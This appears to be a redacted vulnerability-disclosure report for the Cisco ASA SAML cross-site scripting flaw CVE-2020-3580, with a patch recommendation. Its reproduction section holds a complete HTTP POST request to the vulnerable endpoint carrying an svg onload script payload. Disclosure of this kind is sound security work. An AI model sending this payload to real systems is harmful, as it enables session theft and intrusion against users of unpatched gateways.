███████ - XSS - CVE-2020-3580

████ appears to be affected by the Cisco ASA XSS CVE-2020-3580, This vulnerablity is targets the saml service within the VPN. It is triggered via a POST request to /+CSCOE+/saml/sp/acs?tgname=a ## References https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe ## Impact With this vulnerability, an attacker can for example steal users cookies or redirect users on malicious website. ## System Host(s) ██████████ ## Affected Product(s) and Version(s) Cisco ASA ## CVE Numbers CVE-2020-3580 ## Steps to Reproduce send a POST request from browser: POST /+CSCOE+/saml/sp/acs?tgname=a HTTP/1.1 Host: █████ Connection: close sec-ch-ua: " Not;A Brand";v="99", "Google Chrome";v="91", "Chromium";v="91" sec-ch-ua-mobile: ?0 Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 Sec-Fetch-Site: none Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Accept-Encoding: gzip, deflate Accept-Language: en-US,en;q=0.9 Content-Length: 40 SAMLResponse="><svg/onload=alert('xss')> ## Suggested Mitigation/Remediation Actions Patch Cisco ASA : https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-asaftd-xss-multiple-FCB3vPZe